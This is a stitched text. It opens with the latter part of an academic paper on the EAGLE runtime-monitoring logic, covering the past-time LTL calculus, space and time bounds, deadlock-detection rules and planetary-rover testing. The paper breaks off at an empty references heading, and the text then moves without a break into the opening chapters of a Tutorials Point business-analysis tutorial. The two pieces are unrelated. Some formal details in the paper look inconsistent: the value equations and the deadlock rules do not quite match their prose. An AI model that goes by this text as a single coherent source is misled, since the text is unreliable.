\mathit{update}(\text{AlwaysPast}'(F, \mathit{past}_1), s) &= \text{AlwaysPast}'(\mathit{update}(F, s),\ \mathit{eval}(\text{AlwaysPast}'(F, \mathit{past}_1), s))
\end{align*}
\]

Here, in eval, the subformula $\odot \text{AlwaysPast}(F)$ guarded by the previous operator is replaced by the argument $\mathit{past}_1$, which contains the evaluation of the subformula in the previous state. In update we not only update the argument $F$ but also evaluate the subformula $\text{AlwaysPast}'(F, \mathit{past}_1)$ and pass the result as the second argument of AlwaysPast$'$. Thus, in the next state, $\mathit{past}_1$ is bound to the value of $\text{AlwaysPast}'(F, \mathit{past}_1)$ in the current state. Note that in the definition of AlwaysPast we pass true as the second argument: AlwaysPast being defined as a maximal operator, its previous value at the beginning of the trace is true.
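The placeholder technique is what makes trace-free online monitoring possible: between steps, the monitor keeps only the previous verdict $\mathit{past}_1$, never the trace itself. A minimal sketch of this idea for AlwaysPast (class name and state encoding are ours, not the paper's implementation):

```python
class AlwaysPastMonitor:
    """Online monitor for AlwaysPast(F): F has held at every state so far.
    past1 starts as True because AlwaysPast is a maximal rule."""

    def __init__(self, pred):
        self.pred = pred
        self.past1 = True

    def step(self, state):
        # eval(AlwaysPast'(F, past1), s) = eval(F and past1, s);
        # the result becomes past1 for the next state.
        self.past1 = self.pred(state) and self.past1
        return self.past1

m = AlwaysPastMonitor(lambda s: s >= 0)
verdicts = [m.step(s) for s in [1, 2, -1, 5]]
assert verdicts == [True, True, False, False]
```

Once a violating state is seen, the stored summary stays False forever, exactly as the recursive definition demands.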
Similarly, we can give the calculus for the other past-time LTL operators as follows:

\[
\begin{align*}
\text{Previous}(F) &= \text{Previous}'(F, \text{false}) \\
\mathit{eval}(\text{Previous}'(F, \mathit{past}_1), s) &= \mathit{eval}(\mathit{past}_1, s) \\
\mathit{update}(\text{Previous}'(F, \mathit{past}_1), s) &= \text{Previous}'(\mathit{update}(F, s),\ \mathit{eval}(F, s)) \\[6pt]
\text{SometimePast}(F) &= \text{SometimePast}'(F, \text{false}) \\
\mathit{eval}(\text{SometimePast}'(F, \mathit{past}_1), s) &= \mathit{eval}(F \lor \mathit{past}_1, s) \\
\mathit{update}(\text{SometimePast}'(F, \mathit{past}_1), s) &= \text{SometimePast}'(\mathit{update}(F, s),\ \mathit{eval}(\text{SometimePast}'(F, \mathit{past}_1), s)) \\[6pt]
\text{Since}(F_1, F_2) &= \text{Since}'(F_1, F_2, \text{false}) \\
\mathit{eval}(\text{Since}'(F_1, F_2, \mathit{past}_1), s) &= \mathit{eval}(F_2 \lor (F_1 \land \mathit{past}_1), s) \\
\mathit{update}(\text{Since}'(F_1, F_2, \mathit{past}_1), s) &= \text{Since}'(\mathit{update}(F_1, s), \mathit{update}(F_2, s),\ \mathit{eval}(\text{Since}'(F_1, F_2, \mathit{past}_1), s)) \\[6pt]
\text{Zince}(F_1, F_2) &= \text{Zince}'(F_1, F_2, \text{true}) \\
\mathit{eval}(\text{Zince}'(F_1, F_2, \mathit{past}_1), s) &= \mathit{eval}(F_2 \lor (F_1 \land \mathit{past}_1), s) \\
\mathit{update}(\text{Zince}'(F_1, F_2, \mathit{past}_1), s) &= \text{Zince}'(\mathit{update}(F_1, s), \mathit{update}(F_2, s),\ \mathit{eval}(\text{Zince}'(F_1, F_2, \mathit{past}_1), s))
\end{align*}
\]

For the sake of completeness of the calculus we explicitly define value on the above LTL operators as follows:

\[
\begin{align*}
\mathit{value}(\text{AlwaysPast}(F)) &= \mathit{value}(\text{AlwaysPast}'(F, \mathit{past}_1)) = \mathit{value}(\text{Unless}(F_1, F_2)) = \mathit{value}(\text{Zince}'(F_1, F_2, \mathit{past}_1)) = \text{true} \\
\mathit{value}(\text{SometimePast}(F)) &= \mathit{value}(\text{SometimePast}'(F, \mathit{past}_1)) = \mathit{value}(\text{Until}(F_1, F_2)) = \mathit{value}(\text{Since}'(F_1, F_2, \mathit{past}_1)) = \text{false}
\end{align*}
\]

Note that in the above calculus we have eliminated the previous
operator by introducing an auxiliary argument, or placeholder, for every subformula guarded by the \( \circ \) operator. Consequently, we cannot use the operator \( \circ \) directly when writing an LTL formula; instead we use the rule \text{Previous} as defined above.

### Correctness of Evaluation

Given the definitions of the \text{eval}, \text{update} and \text{value} functions for the different operators of LTL, as detailed above, we claim that for a given sequence \( \sigma = s_1 s_2 \ldots s_n \) and an LTL formula \( F \) embedded in EAGLE:
\[ \sigma, 1 \models F \iff \text{value}(\text{eval}(\ldots \text{eval}(\text{eval}(F, s_1), s_2) \ldots, s_n)) = \text{true} \]
Insufficient space prohibits inclusion of the proof.

### 4 Implementation and Complexity

We have implemented the EAGLE monitoring framework in Java. In order to make the implementation efficient we use the decision procedure of Hsiang [13]. The procedure reduces a tautological formula to the constant true, a contradictory formula to the constant false, and every other formula to a canonical form: an exclusive disjunction \( (\oplus) \) of conjunctions. The procedure is given by the following equations, which are shown to be Church-Rosser and terminating modulo the associativity and commutativity of \( \oplus \) and \( \land \); a formula is simplified by applying them as rewrite rules from left to right:
\[
\neg \phi = \text{true} \oplus \phi \\
\phi_1 \lor \phi_2 = (\phi_1 \land \phi_2) \oplus \phi_1 \oplus \phi_2 \\
\phi_1 \rightarrow \phi_2 = \text{true} \oplus \phi_1 \oplus (\phi_1 \land \phi_2) \\
\phi_1 \leftrightarrow \phi_2 = \text{true} \oplus \phi_1 \oplus \phi_2 \\
\text{false} \land \phi = \text{false} \qquad \text{true} \land \phi = \phi \qquad \phi \land \phi = \phi \\
\phi_1 \land (\phi_2 \oplus \phi_3) = (\phi_1 \land \phi_2) \oplus (\phi_1 \land \phi_3) \\
\text{false} \oplus \phi = \phi \qquad \phi \oplus \phi = \text{false}
\]
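When atoms are the only leaves, this canonical form can be prototyped compactly: represent a formula as a set of conjunctions, each conjunction a frozenset of atoms. This toy encoding is our own (the real implementation must also treat temporal subformulas as leaves), and several of the equations fall out of the data structure itself.

```python
# Toy exclusive-or normal form in the spirit of Hsiang's procedure.
# A formula = set of conjunctions; a conjunction = frozenset of atoms.
# The empty conjunction is "true"; the empty set of conjunctions is
# "false". Atoms-only encoding; an illustration, not the EAGLE code.

TRUE, FALSE = {frozenset()}, set()

def xor(a, b):
    return a ^ b               # c (+) c = false: duplicates cancel

def conj(a, b):
    # distribute /\ over (+), cancelling duplicate products pairwise
    out = set()
    for ca in a:
        for cb in b:
            out ^= {ca | cb}   # phi /\ phi = phi inside a conjunction
    return out

def neg(a):
    return xor(TRUE, a)        # ~phi = true (+) phi

def disj(a, b):
    # phi1 \/ phi2 = (phi1 /\ phi2) (+) phi1 (+) phi2
    return xor(xor(conj(a, b), a), b)

p, q = {frozenset({"p"})}, {frozenset({"q"})}
print(disj(p, p) == p)           # idempotence of \/
print(xor(p, p) == FALSE)        # phi (+) phi = false
print(conj(neg(p), p) == FALSE)  # a contradiction reduces to false
```

Because the representation is a set of sets, associativity, commutativity and the cancellation equations are enforced automatically; only distribution needs explicit code.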
#### Theorem 1

The size of the formula at any stage of monitoring is bounded by \( O(m^2 \, 2^m \log m) \), where \( m \) is the size of the initial LTL formula \( \phi \) with which we started monitoring.

**Proof** The above set of equations, when regarded as simplification rules, keeps any LTL formula in a canonical form, namely an exclusive disjunction of conjunctions, where the conjuncts are either propositions or subformulas having temporal operators at the top. Moreover, after a series of applications of \text{eval} on the states \( s_1 s_2 \ldots s_n \), the conjuncts in the normal form \( \text{eval}(\ldots \text{eval}(\text{eval}(\phi, s_1), s_2) \ldots, s_n) \) are propositions or subformulas of the initial formula \( \phi \), each having a temporal operator at its top. Since there are at most \( m \) such subformulas, there are at most \( 2^m \) ways to combine them in a conjunction. The space requirement for a conjunction is \( O(m \log m) \), assuming that in the conjunction, instead of keeping the actual conjuncts, we keep pointers to them and that each pointer takes \( O(\log m) \) bits.¹ Therefore, one needs space \( O(m \, 2^m \log m) \) to store the structure of any exclusive disjunction of such conjunctions. Next, we need to consider the storage requirements for each of the conjuncts that appears in such a conjunction.

---

¹Every unique subformula having a temporal operator at the top in the original formula can give rise to several copies in the process of monitoring. For example, \( F_1 = \Box \phi \) may after some steps get converted to \( F_2 = \phi \land \Box \phi \); in \( F_2 \) the two subformulas \( \phi \) are essentially copies of \( \phi \) in \( F_1 \). It is easy to see that all such copies will be the same at any stage of monitoring, so we can keep a single copy and point to it from within the formula.
Note that, if a conjunct contains a nested past-time operator, the \( \text{past}_1 \) argument of that operator can itself be a formula. However, instead of storing the actual formula in the argument \( \text{past}_1 \) we can store a pointer to it. Thus, each conjunct takes space at most \( O(m \log m) \), and hence the space required by all the conjuncts is \( O(m^2 \log m) \). Moreover, for each past-time operator we have a formula that is pointed to by its \( \text{past}_1 \) argument; by the above reasoning, each of these at most \( m \) formulas takes space \( O(m \, 2^m \log m) \). Hence the total space requirement is \( O(m \, 2^m \log m + m^2 \log m + m^2 \, 2^m \log m) \), which is \( O(m^2 \, 2^m \log m) \).

The implementation contains a strategy for the application of these equations that ensures that the time complexity of each step in monitoring is bounded. We describe the strategy briefly. Since our LTL formulas are exclusive disjunctions of conjunctions, we can treat them as trees of depth two: the root node at depth 0 represents the \( \oplus \) operator, the children of the root at depth 1 represent the \( \land \) operators, and the leaf nodes at depth 2 represent propositions and subformulas having temporal operators at the top. The eval function is applied to this tree in depth-first fashion and the resulting formula is built up bottom-up. At the leaves, the application of eval results either in the evaluation of a proposition or in the evaluation of a rule. The evaluation of a proposition returns true or false; we assume this takes unit time. The evaluation of a rule, on the other hand, may result in another formula in canonical form. The formula at an internal node (a \( \land \) node or a \( \oplus \) node) is then obtained by taking the conjunction (respectively, exclusive disjunction) of the formulas of the children as they get evaluated, and simplifying the result with the set of simplification equations.
Note that the application of the simplification equations to the conjunction of two formulas requires the distributive equation \( \phi_1 \land (\phi_2 \oplus \phi_3) = (\phi_1 \land \phi_2) \oplus (\phi_1 \land \phi_3) \) and possibly other equations. At any stage of this algorithm three formulas are active: the original formula \( F \) on which eval is applied, the partially constructed result formula, and the result of evaluating the current subformula. So, by Theorem 1, the space complexity of this algorithm is \( O(m^2 \, 2^m \log m) \). Moreover, as the algorithm traverses the formula, at each node it can spend up to \( O(m \, 2^m \log m) \) time computing a conjunction or exclusive disjunction. Hence the time complexity of the algorithm is \( O(m \, 2^m \log m) \cdot O(m \, 2^m \log m) \), that is, \( O(m^2 \, 4^m \log^2 m) \). These two bounds are stated in the following theorem.

**Theorem 2** At any stage of monitoring, the space and time complexity of evaluating the monitored LTL formula on the current state are \( O(m^2 \, 2^m \log m) \) and \( O(m^2 \, 4^m \log^2 m) \), respectively.

## 5 Examples and Experiments

This section illustrates the use of EAGLE on two concurrency-related applications: detection of deadlock potentials, and testing of a real-time concurrent system.

### 5.1 Using EAGLE for Deadlock Detection

We present an example that illustrates the use of EAGLE to detect a simple class of cyclic deadlocks. Specifically, EAGLE monitors an event stream of lock acquisitions and releases, and reports any cyclic lock dependencies. If there are two threads \( t_1 \) and \( t_2 \) such that \( t_1 \) takes lock \( l_1 \) and then, prior to releasing \( l_1 \), takes lock \( l_2 \), and furthermore \( t_2 \) takes lock \( l_2 \) and then, prior to releasing \( l_2 \), takes lock \( l_1 \), then there is a cyclic lock dependency that indicates the possibility of deadlock. This is a simplification of the general dining philosophers problem, restricted to cycles of length two. We present two implementations.
One illustrates how EAGLE integrates with Java, allowing one to intermix algorithms written in a general programming language with EAGLE monitors. The other is a "pure" solution that uses only EAGLE rules. Each solution utilizes the ability of EAGLE to parameterize rules with data values as well as formulas. For both implementations, the state observed by EAGLE contains three integer variables that get updated each time a new lock or release event is sent to the observer. Let s be the object representing the observer state. The variable s.type is set to 1 if the event is a lock event and 2 if it is a release event; s.thread is an integer that uniquely identifies the thread, and s.lock uniquely identifies the lock. For clarity we define predicates s.lock() and s.release() that test whether s.type is set to 1 or 2, respectively. We first present the pure solution.

```
min Conflict(int t, int l1, int l2) =
    Until(¬(s.release() ∧ s.thread = t ∧ s.lock = l2),
          s.lock() ∧ s.thread = t ∧ s.lock = l1)

min ConflictLock(int t, int l1, int l2) =
    s.lock() ∧ s.thread ≠ t ∧ s.lock = l2 ∧ Conflict(s.thread, l1, l2)

min NestedLock(int t, int l) =
    Until(¬(s.release() ∧ s.thread = t ∧ s.lock = l),
          s.lock() ∧ s.thread = t ∧ s.lock ≠ l ∧
              (Sometime(ConflictLock(t, l, s.lock)) ∨
               SomePast(ConflictLock(t, l, s.lock))))

mon M = ¬Sometime(s.lock() ∧ NestedLock(s.thread, s.lock))
```

The intuition is that the Sometime in monitor \( M \) is satisfied in a state where a lock is taken that is the "first" of the four locks in the pattern described above. The thread and the lock value of that lock are passed as data parameters to *NestedLock*, which "searches" for a subsequent lock taken by that thread prior to the release of the first lock.
If such a second lock is found, it binds the data value of the second lock to a data parameter and searches both forward and backward through the trace with *ConflictLock* for a second thread that takes the two locks in reverse order.

The second implementation uses a set data structure within the observer state that holds triples of values of the form \( [t_1, l_1, l_2] \), recording that thread \( t_1 \) took nested locks \( l_1 \) and then \( l_2 \). The predicate *addTriple* inserts such a triple into the set and evaluates to true if there is no conflicting triple in the set, a conflicting triple being one of the form \( [t_2, l_2, l_1] \) for \( t_2 \neq t_1 \).
\[
\text{max } \text{DiffLock}(t_1, l_1) = s.lock() \land s.thread = t_1 \land s.lock \neq l_1 \\
\text{max } \text{CheckLock}(t_1, l_1) = s.lock() \land s.thread = t_1 \land s.lock = l_1 \\
\text{max } \text{Release}(t_1, l_1) = s.release() \land s.thread = t_1 \land s.lock = l_1 \\
\text{min } \text{NestedDiffLock}(t_1, l_1) = \text{Until}(\neg\text{Release}(t_1, l_1), \text{DiffLock}(t_1, l_1)) \\
\text{min } \text{NestedCheckLock}(t_1, l_1) = \text{Until}(\neg\text{Release}(t_1, l_1), \text{CheckLock}(t_1, l_1)) \\
\text{mon } M = \text{Always}((s.lock() \land \text{NestedDiffLock}(s.thread, s.lock)) \rightarrow \text{NestedCheckLock}(s.thread, s.lock))
\]
The monitor identifies a first lock, and the rule *NestedDiffLock* returns true if a second, nested lock is taken. If so, *NestedCheckLock* adds the triple to the set and returns false if a conflict exists.

### 5.2 Testing a Planetary Rover

The EAGLE logic has been applied in the testing of a planetary rover controller, as part of an ongoing collaborative effort with other colleagues (see [2]) to create a fully automated test-case generation and execution environment for this application.
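The triple-set idea translates directly into ordinary code. The following Python sketch is not EAGLE: the event format `(kind, thread, lock)` and all names are our own. It records a triple for every nested acquisition and reports a conflict whenever a reversed triple from a different thread already exists.

```python
# Plain-Python rendering of the triple-set deadlock check (cycles of
# length two). Event format and names are illustrative assumptions.

def find_lock_cycles(events):
    held = {}        # thread -> locks currently held, in order taken
    triples = set()  # (thread, outer_lock, inner_lock)
    conflicts = []
    for kind, thread, lock in events:
        if kind == "release":
            if lock in held.get(thread, []):
                held[thread].remove(lock)
            continue
        # a lock taken while others are held creates nested pairs
        for outer in held.get(thread, []):
            for (t2, l1, l2) in triples:
                # reversed pair taken by a different thread: potential cycle
                if t2 != thread and l1 == lock and l2 == outer:
                    conflicts.append((thread, t2, outer, lock))
            triples.add((thread, outer, lock))
        held.setdefault(thread, []).append(lock)
    return conflicts

events = [("lock", 1, "A"), ("lock", 1, "B"), ("release", 1, "B"),
          ("release", 1, "A"),
          ("lock", 2, "B"), ("lock", 2, "A")]
print(find_lock_cycles(events))  # [(2, 1, 'B', 'A')]
```

As in the paper's second implementation, the check fires even though the two threads never overlap in time: the cyclic lock order alone signals the deadlock potential.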
The controller consists of 35,000 lines of C++ code and is implemented as a multi-threaded system, where synchronization between threads is performed through shared variables, mutexes and condition variables. The controller operates a rover, named K9, which essentially is a small car/robot on wheels. K9 itself is a prototype, and serves as the basis for experiments with rover missions on Mars. The controller executes plans given as input. A plan is a tree-like structure of actions and sub-actions. The leaf actions control the rover hardware components. Each action is optionally associated with time constraints indicating when it should start and when it should terminate. Figure 3 presents an example input plan. The plan is named P and consists of two sub-tasks T1 and T2, which are supposed to be executed sequentially in the given order. The plan specifies that T1 should start 1-5 seconds after P starts and should end 1-30 seconds after T1 starts. Task T2 should start 10-20 seconds after T1 ends. The controller has been hand-instrumented in a few places to generate an execution trace when executed. An example execution trace of the plan in Figure 3 is presented below:

```plaintext
start P 397
start T1 1407
success T1 2440
start T2 14070
success T2 15200
success P 15360
```

In addition to information about start and (successful or failing) termination, each event in the trace is associated with a time-stamp in milliseconds since the start of the application. The testing environment, named X9 (explorer of K9), contains a test-case generator that automatically generates input plans for the controller from a grammar describing the structure of plans. A model checker extended with symbolic execution is used to generate the plans [14]. Additionally, for each input plan a set of temporal formulas is generated that the execution trace obtained by executing that plan should satisfy.
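The generated timing properties can be checked with a small script. The constraint encoding below is our own illustration of the constraints stated for plan P, not the format X9 actually generates.

```python
# Sketch: checking the timing constraints of the example plan against
# the example trace. Constraint encoding is an assumption, not X9's.

def parse_trace(text):
    """Lines like 'start P 397' -> {(event, task): timestamp_ms}."""
    out = {}
    for line in text.strip().splitlines():
        event, task, ts = line.split()
        out[(event, task)] = int(ts)
    return out

def check(times, constraints):
    """Each constraint (evt1, evt2, lo_ms, hi_ms) requires
    lo <= t(evt2) - t(evt1) <= hi; returns the violated ones."""
    failures = []
    for e1, e2, lo, hi in constraints:
        delta = times[e2] - times[e1]
        if not lo <= delta <= hi:
            failures.append((e1, e2, delta))
    return failures

trace = """
start P 397
start T1 1407
success T1 2440
start T2 14070
success T2 15200
success P 15360
"""
constraints = [
    (("start", "P"), ("start", "T1"), 1000, 5000),      # T1 starts 1-5 s after P
    (("start", "T1"), ("success", "T1"), 1000, 30000),  # T1 ends 1-30 s after it starts
    (("success", "T1"), ("start", "T2"), 10000, 20000), # T2 starts 10-20 s after T1 ends
]
print(check(parse_trace(trace), constraints))  # []: all constraints hold
```

The real system expresses these constraints as temporal formulas checked by the EAGLE monitor; this sketch only demonstrates that the example trace indeed satisfies the stated bounds.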
The controller is executed on each generated plan, and the implementation of EAGLE is used to monitor that the resulting execution trace satisfies the formulas generated for that particular plan. The properties generated for the plan in Figure 3 are presented in Figure 4 and should be self-explanatory. X9 was evaluated by seeding errors in the rover controller. One error had to do with the closeness in time between the termination of one task and the start of its successor. If a task T1 ended in a particular time range (after the start time of the successor T2), then task T2 would wrongly fail rather than execute. Running X9 detected this problem immediately. Note that the property violated was binary/propositional in nature: a task failed that should have succeeded.

Figure 3. Example plan

Figure 4. Generated properties

EAGLE allows for the formulation of real-time properties that take the time stamps into account. Such an experiment is mentioned in [5]. In that experiment a real, previously unknown bug was located: the application did not check lower bounds on durations, whereas it should have. That is, if a task finished before it was supposed to, the task should fail, but it wrongly succeeded. The bug was not immediately corrected, and later showed up during a field test of the rover.

## 6 Conclusion and Future Work

We have presented a representation of linear temporal logic with both past and future temporal operators in EAGLE. We have shown how the generalized monitoring algorithm for EAGLE becomes simple and elegant for this particular case. We have bounded the space and time complexity of this specialized algorithm and thus shown that general LTL monitoring is space efficient in the EAGLE framework. Initial experiments have been successful.
Future work includes optimizing the current implementation and investigating other efficient subsets of EAGLE.

## References
**About the Tutorial**

Business Analysis is a subject which provides concepts and insights into the development of the initial framework for any project. It holds the key to guiding the key stakeholders of a project in performing business modelling in a systematic manner. This tutorial provides a brief overview of the concepts of business analysis in an easy-to-understand manner.

**Audience**

This tutorial is meant for aspiring business analysts, and for project owners or business owners, coordinators and project team members who often work closely with business analysts. In addition, it will also be useful for anyone who is involved in capturing, writing, analyzing, or understanding requirements for Information Technology solutions, including Subject Matter Experts (SME), Business Process Managers, and Business Process Users.

**Prerequisites**

To understand this tutorial, it is advisable to have a foundation-level knowledge of business scenarios, processes, and domain knowledge pertaining to a few industries.

**Copyright & Disclaimer**

© Copyright 2017 by Tutorials Point (I) Pvt. Ltd. All the content and graphics published in this e-book are the property of Tutorials Point (I) Pvt. Ltd. The user of this e-book is prohibited to reuse, retain, copy, distribute or republish any contents or a part of contents of this e-book in any manner without written consent of the publisher. We strive to update the contents of our website and tutorials as timely and as precisely as possible, however, the contents may contain inaccuracies or errors. Tutorials Point (I) Pvt. Ltd. provides no guarantee regarding the accuracy, timeliness or completeness of our website or its contents including this tutorial. If you discover any errors on our website or in this tutorial, please notify us at contact@tutorialspoint.com.

# Table of Contents

- About the Tutorial
- Audience
- Prerequisites
- Copyright & Disclaimer
- Table of Contents

1. BUSINESS ANALYSIS – INTRODUCTION
2. SOFTWARE DEVELOPMENT LIFE CYCLE
   - Post SDLC Process
   - Role of Business Analyst during SDLC Process
3. ROLES OF BUSINESS ANALYSTS
   - Major Roles of a BA
   - Key Responsibilities of a Business Analyst
   - What a BA is Expected to Deliver?
4. BA TOOLS AND TECHNIQUES
   - Functional and Non-Functional Requirements
5. JAD SESSION
   - Use of a JAD Session
   - Participants in a JAD Session
6. REQUIREMENT GATHERING TECHNIQUES
7. FUNCTIONAL REQUIREMENTS DOCUMENT
   - Functional Requirements Deliverables
8. SOFTWARE REQUIREMENTS SPECIFICATION
9. USE-CASES
   - What is a Use-Case?
   - Benefits of a Use-Case
   - The Anatomy of a Use-Case
   - Guidance for Use-Case Template
   - Use-Case Definition
10. USE-CASE DIAGRAMS
    - Drawing Use-Case Diagrams
    - Example – Withdrawal Use-Case
    - Use-Case Template
11. REQUIREMENTS MANAGEMENT
    - Why Projects Fail
    - Why Successful Teams do Requirements Management
    - Let's Start with the Basics
    - Collaboration & Buy-In from Stakeholders
12. PLANNING GOOD REQUIREMENTS
    - Requirement Gathering and Analysis
    - Eliciting Approach
    - Different Types of Requirements
    - Traceability & Change Management
    - Quality Assurance
    - Obtaining Requirements Signoff
13. BUSINESS MODELLING
    - Purpose of Business Modelling
    - Performing GAP Analysis
    - To Assess Proposed System
    - Guiding Principles for Business Modelling
    - Example of BA role in Modelling ERP Systems
    - Functional Business Analyst
    - Other Major Activities
    - Tool 1: Microsoft Visio
    - Tool 2: Enterprise Architect
    - Tool 3: Rational Requisite Pro

**What is Business Analysis?**

Business Analysis is the set of tasks, knowledge, and techniques required to identify business needs and determine solutions to enterprise business problems. Although the general definition is similar, the practices and procedures may vary across industries. In the information technology industry, solutions often include a systems development component, but may also consist of process improvement or organizational change. Business analysis may also be performed to understand the current state of an organization or to serve as a basis for the identification of business needs. In most cases, however, business analysis is performed to define and validate solutions that meet business needs, goals, or objectives.

**Who is a Business Analyst?**

A business analyst is someone who analyzes an organization or business domain (real or hypothetical) and documents its business, processes, or systems, assessing the business model or its integration with technology. Organizational titles vary, however, and include analyst, business analyst, business systems analyst, and systems analyst.

**Why a Business Analyst?**

Organizations employ business analysis for the following reasons:

- To understand the structure and the dynamics of the organization in which a system is to be deployed.
- To understand current problems in the target organization and identify improvement potentials.
- To ensure that the customer, end user, and developers have a common understanding of the target organization.
In the initial phase of a project, when the requirements are being interpreted by the solution and design teams, the role of a business analyst is to review the solution documents, work closely with the solution designers (the IT team) and project managers, and ensure that the requirements are clear.

In a typical large IT organization, especially in a development environment, you will find on-site as well as offshore delivery teams with the above-mentioned roles. The business analyst acts as the key link between the two teams: sometimes interacting with business users, at other times with technical users, and finally with all the stakeholders in the project to get approval and a final nod before proceeding with the documentation. Hence, the role of the BA is crucial to an effective and successful start for any project.

**Role of an IT Business Analyst**

The role of a business analyst starts with defining and scoping the business areas of the organization, then eliciting the requirements, analyzing and documenting the requirements, communicating these requirements to the appropriate stakeholders, identifying the right solution, and then validating the solution to check whether the requirements meet the expected standards.

**How is it Different from Other Professions?**

Business analysis is distinct from financial analysis, project management, quality assurance, organizational development, testing, training, and documentation development. However, depending on the organization, a business analyst may perform some or all of these related functions. Business analysts who work solely on developing software systems may be called IT business analysts, technical business analysts, online business analysts, business systems analysts, or systems analysts. Business analysis also includes the work of liaison among stakeholders, development teams, testing teams, etc.
Software Development Life Cycle (SDLC) is a process followed in a software project within a software organization. It consists of a detailed plan describing how to develop, maintain, replace, and alter or enhance specific software. It defines a methodology for improving the quality of software and the overall development process.

- SDLC is a process used by IT analysts to develop or redesign a high-quality software system that meets both customer and real-world requirements.
- It takes into consideration all the associated aspects of software testing, analysis, and post-process maintenance.

The important phases of SDLC are depicted in the following illustration:

**Planning Stage**

Every activity must start with a plan. Failing to plan is planning to fail. The degree of planning differs from one model to another, but it is very important to have a clear understanding of what we are going to build by creating the system's specifications.

**Defining Stage**

In this phase, we analyze and define the system's structure. We define the architecture, the components, and how these components fit together to produce a working system.

**Designing Stage**

In system design, the design functions and operations are described in detail, including screen layouts, business rules, process diagrams, and other documentation. The output of this stage describes the new system as a collection of modules or subsystems.

**Building Stage**

This is the development phase. We start code generation based on the system's design, using compilers, interpreters, and debuggers to bring the system to life.

**Implementation**

Implementation is a part of the building stage, in which the code produced during development is integrated into a working system.

**Testing Stage**

As different parts of the system are completed, they are put through a series of tests.
It is tested against the requirements to make sure that the product actually solves the needs identified during the requirements phase.

- Test plans and test cases are used to identify bugs and to ensure that the system works according to the specifications.
- In this phase, different types of testing, such as unit testing, manual testing, acceptance testing and system testing, are performed.

**Defect Tracking in Testing**

Software test reports are used to communicate the results of the executed test plans. A report should therefore contain all test information that pertains to the system currently being tested. The completeness of reports is verified in walkthrough sessions.

Testing for a project seeks to accomplish two main goals:

- Detect failures and defects in the system.
- Detect inconsistencies between requirements and implementation.

The following flowchart depicts the **Defect Tracking Process**:

To achieve these goals, the testing strategy for the proposed system will usually consist of four testing levels: unit testing, integration testing, acceptance testing, and regression testing. The following subsections outline these testing levels, the development team roles responsible for developing and executing them, and the criteria for determining their completeness.

**Deployment**

After the test phase ends, the system is released and enters the production environment. Once the product is tested and ready to be deployed, it is released formally in the appropriate market. Sometimes product deployment happens in stages, as per the organization's business strategy. The product may first be released in a limited segment and tested in the real business environment (UAT - User Acceptance Testing). Then, based on the feedback, the product may be released as-is or with suggested enhancements in the targeted market segment.

**Post-SDLC Process**

After the product is released in the market, it is maintained for the existing customer base.
Once in the production environment, the system will undergo modifications because of undetected bugs or other unexpected events. The system is evaluated and the cycle is repeated to maintain it.

**Role of a Business Analyst during the SDLC Process**

As the diagram below shows, the BA is involved in eliciting business requirements and converting them into solution requirements. He is involved in translating the solution features into software requirements. He then leads the analysis and design phases, guides code development, follows the testing phase through bug fixing as a change agent in the project team, and ultimately ensures that the customer requirements are fulfilled.

The role of a business analyst in an IT project can be multi-fold. It is possible for project team members to have multiple roles and responsibilities. In some projects, the BA may take on the roles of the Business Intelligence Analyst, Database Designer, Software Quality Assurance Specialist, Tester, and/or Trainer when there are limited resources available. It is also possible for a Project Coordinator, an Application Development Lead, or a Developer to take on the role of the Business Analyst in specific projects.

Business analysis overlaps heavily with analyzing the requirements a business has in order to function as usual and to optimize how it functions. Some examples of business analysis are:

- Creating Business Architecture
- Preparing a Business Case
- Conducting Risk Assessment
- Requirements Elicitation
- Business Process Analysis
- Documentation of Requirements

**Major Roles of a BA**

A key role of most business analysts is to act as the liaison between the business and the technical developers. Business analysts work together with the business clients to gather and define the requirements of a system or process to improve productivity, while at the same time working with the technical teams to design and implement the system or process.
**As a Contributor**

The major responsibility of a BA is to work with business users / key users to identify business problems, needs and functions, to understand stakeholders' concerns and requirements in order to identify improvement opportunities, and to contribute business input for developing the business case for the IT system development project.

**As a Facilitator**

A Business Analyst is also supposed to facilitate and coordinate the elicitation and analysis of requirements, collaborate and communicate with stakeholders to manage their expectations and needs, and ensure that the requirements are complete and unambiguous and map to the real business needs of the organization.

**As an Analyst**

Another important role is to assess the proposed system and the organizational readiness for system implementation, and to provide support to users and coordinate with IT staff. This includes reviewing and providing input to the design of the proposed IT system from the business perspective, resolving issues and conflicts among stakeholders, helping organize a comprehensive and quality UAT by assisting users in developing test cases, and helping organize training, all with the aim of ensuring that the deployed IT system is capable of meeting the business needs and requirements as well as realizing the anticipated benefits.

The BA also plans and monitors the business analysis activities: developing the scope, schedule and approach for performing the activities related to business analysis for the IT system development project, monitoring progress, coordinating with the internal Project Manager, and reporting on revenue, profitability, risks and issues wherever appropriate.
**Key Responsibilities of a Business Analyst**

The responsibility set of a business analyst requires him to fulfill different duties in different phases of a project, as elucidated below:

**Initiation Phase**

This phase marks the beginning of a new project, in which a business analyst carries out the following responsibilities:

- Assist in carrying out the cost-benefit analysis of the project.
- Understand the business case.
- Ascertain the feasibility of the solution/project/product.
- Help in creating the project charter.
- Identify the stakeholders in the project.

**Planning Phase**

This phase involves gathering the requirements and planning how the project will be executed and managed. His responsibilities include the following:

- Elicit the requirements.
- Analyze, organize and document the requirements.
- Manage requirements by creating use-cases, RTM, BRD, SRS, etc.
- Assess proposed solutions.
- Liaise and enhance communications with stakeholders.
- Assist in formulating the project management plans.
- Help in finding the project's scope, constraints, assumptions and risks.
- Assist in designing the user experience of the solution.

**Executing Phase**

This phase marks the development of the solution as per the requirements gathered. The responsibilities include:

- Explain the requirements to the IT/development team.
- Clarify doubts and concerns regarding the proposed solution to be developed.
- Discuss and prioritize project scope changes and gain agreement.
- Create beta test scripts for initial testing.
- Share the modules under development with stakeholders and solicit their feedback.
- Follow deadlines and manage stakeholders' expectations.
- Resolve conflicts and manage communications within the project team.

**Monitoring and Controlling Phase**

In this phase, the project is measured and controlled for any deviations from the initial plans. This phase runs simultaneously with the execution phase.
During this phase, the responsibilities are:

- Develop test scripts and conduct comprehensive module and integration testing.
- Conduct UAT (user acceptance testing) and create testing reports.
- Gain acceptance/approval of the deliverables from the client.
- Explain the change requests to the development team.
- Monitor the development of the change requests and verify their implementation as per the project's objective.

**Closing Phase**

This phase marks the closure of the project. The responsibilities are:

- Present the completed project to the client and gain their acceptance.
- Create user-training manuals, functional material and other instructional guides.
- Conduct elaborate integration testing in the production environment.
- Create the final product documentation and document the project lessons learned.

**What is a BA Expected to Deliver?**

A Business Analyst serves as the bridge between the business users and the technical IT people. Their presence contributes significantly to the success of IT projects. There are many benefits of having a dedicated business analyst. A dedicated business analyst can:

- Deliver a clear project scope from a business point of view.
